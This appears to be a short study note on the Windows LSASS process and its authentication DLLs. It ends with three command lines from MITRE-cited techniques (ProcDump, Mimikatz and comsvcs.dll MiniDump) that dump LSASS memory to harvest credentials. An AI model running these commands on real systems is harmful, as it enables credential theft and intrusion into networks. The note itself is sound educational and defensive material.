LSASS - Local and Domain
1.0 Local Security Authority Subsystem Service
LSASS is a process rather than a file. As we can see from Task Manager
, it runs as SYSTEM.
According to Microsoft's website:
The LSA security subsystem provides services to both the kernel mode and user mode for validating access to objects, checking user privileges, and generating audit messages.
I noticed LSA and LSASS from the above website, but I simply had no clue what they were. A quick description of LSA and LSASS was found on StackExchange:
There is "LSA" the concept, and "lsass.exe," a process that implements many of the functions of LSA.
Authentication-Related Files
File Name | Description |
Netlogon.dll | Manages the computer's secure channel to a domain controller, passing credentials securely and handling replication for Windows NT domain controllers. |
Msv1_0.dll | Implements the NTLM authentication protocol for clients that don’t use Kerberos. |
Schannel.dll | Provides Secure Sockets Layer (SSL) authentication over encrypted channels. |
Kerberos.dll | Implements the Kerberos v5 authentication protocol. |
Kdcsvc.dll | Kerberos Key Distribution Center (KDC) service, responsible for issuing ticket-granting tickets. |
Lsasrv.dll | The Local Security Authority (LSA) server service, which enforces security policies. |
Samsrv.dll | Manages the Security Accounts Manager (SAM), storing local accounts and enforcing policies. |
Ntdsa.dll | The directory service module supporting Windows replication and LDAP, managing data partitions. |
Secur32.dll | A multiple authentication provider that integrates various authentication components. |
1.1 LSASS Memory Dump
According to MITRE, credentials in the LSASS process memory can be dumped in many ways.
1.1.1 ProcDump
procdump -ma lsass.exe lsass_dump
1.1.2 Mimikatz
sekurlsa::Minidump lsassdump.dmp
1.1.3 Built-in Windows Tools - comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full